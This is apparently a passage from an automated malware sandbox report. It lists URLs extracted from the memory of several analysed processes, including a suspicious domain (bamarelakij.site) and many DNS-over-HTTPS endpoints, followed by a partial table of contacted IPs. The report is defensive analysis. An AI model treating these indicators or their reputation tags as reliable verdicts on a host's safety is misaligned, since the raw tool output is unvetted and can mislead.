                                                                                  http://www.reneelab.de/product-land-237.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                    		high
                                                                                    https://office.net/msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.reneelab.com/product-land-188.htmlhttp://support.reneelab.com/anonymous_requests/newstoreRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                        		high
                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://dns.levonet.sk/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://trolltech.com/xml/features/report-whitespace-only-CharDatahttp://xml.org/sax/features/namespaRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.phreedom.org/md5)RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                            		high
                                                                                            http://wixtoolset.org/schemas/v4/BundleExtensionDatakXzODlqJak.exe, 00000002.00000003.1492963333.0000000003340000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000003.1492931607.0000000003338000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                              		high
                                                                                              http://www.reneelab.kr/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                		high
                                                                                                http://www.reneelab.jp/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                  		high
                                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://bamarelakij.site/roiLocalCtrl_alpha_v3.exe, 00000009.00000003.2253730305.000000000051B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://www.winimage.com/zLibDll1.2.6RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                      		high
                                                                                                      https://dns64.dns.google/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.reneelab.net/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                          		high
                                                                                                          https://doh.opendns.com/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://qt.digia.com/product/licensingRescueCDBurner.exe, 00000004.00000002.1588722536.000000006B8DE000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.ecosia.org/newtab/LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://trolltech.com/xml/features/report-start-end-entityUnknownRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.symauth.com/cps0(RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r1&FrontEnd=AFDLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://msn.cn/msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.symauth.com/rpa00RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://public.dns.iij.jp/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.info-zip.org/RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009F7A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C13000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.0000000005469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://trolltech.com/xml/features/report-start-end-entityRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://ntp.msn.comcache-controlpublicLocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://ntp.msn.comcache-control:publicLocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.0000000008163000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://downloads.reneelab.com.cn/passnow/passnow_RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://appsyndication.org/2006/appsynkXzODlqJak.exefalse
                                                                                                                                          		high
                                                                                                                                          http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/common/icons/copilot_color.svgLocalCtrl_alpha_v3.exe, 00000009.00000003.2504789916.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://support.reneelab.com/anonymous_requests/newstore/buy-renee-passnowentrare-nel-bios.htmlItaliaRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://support.reneelab.com/anonymous_requests/newRescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.reneelab.fr/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://downloads.reneelab.com.cn/download_api.phpRescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://dns.google/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://ntp.msn.comLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.reneelab.cc/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://msn.com/msedge.exe, 00000010.00000002.2398826177.00002EC0003B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://doh.quickline.ch/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.reneelab.de/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://wixtoolset.org/schemas/v4/2008/BurnkXzODlqJak.exe, 00000000.00000003.1465601064.0000000000758000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1465995762.000000000079A000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1796485878.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000000.00000003.1465995762.000000000074F000.00000004.00000020.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1795762434.00000000057B0000.00000004.00000800.00020000.00000000.sdmp, kXzODlqJak.exe, 00000002.00000002.1795577677.0000000005300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://x1.c.lencr.org/0LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://x1.i.lencr.org/0LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://isecure-a.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0DRescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2480188574.0000000008149000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.0000000008149000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://downloads.reneelab.com/download_api.phphttps://downloads.reneelab.com.cn/download_api.php?acRescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://doh-02.spectrum.com/dns-queryLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://www.trialpay.com/productpage/?c=3016dc6&tid=6rpipboRescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.reneelab.comRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://ntp.msn.com/LocalCtrl_alpha_v3.exe, 00000009.00000003.2419224133.000000000803B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000803A000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://bugreports.qt-project.org/RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.reneelab.com.cn/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://www.reneelab.pl/RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-streaLocalCtrl_alpha_v3.exe, 00000009.00000003.2467217730.0000000008021000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startLocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.reneelab.comwww.reneelab.comhttp://https://0RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserRescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://xml.org/sax/features/namespacesRescueCDBurner.exe, 00000003.00000002.1525593484.000000006C3B9000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1587725312.000000006B209000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.quad9.net/home/privacy/LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000812F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://isecure.reneelab.com.cn/webapi.php?code=RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                                                          		high

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          23.219.82.19
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          184.28.190.91
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          3.171.139.32
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          131.253.33.203
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          23.219.82.58
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                          162.159.61.3
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          142.250.185.161
                                                                                                                                                                                                          		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                          13.89.178.27
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          20.110.205.119
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          204.79.197.219
                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                          172.64.41.3
                                                                                                                                                                                                          		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                          18.244.18.32
                                                                                                                                                                                                          		sb.scorecardresearch.comUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          23.200.0.38
                                                                                                                                                                                                          		unknownUnited States
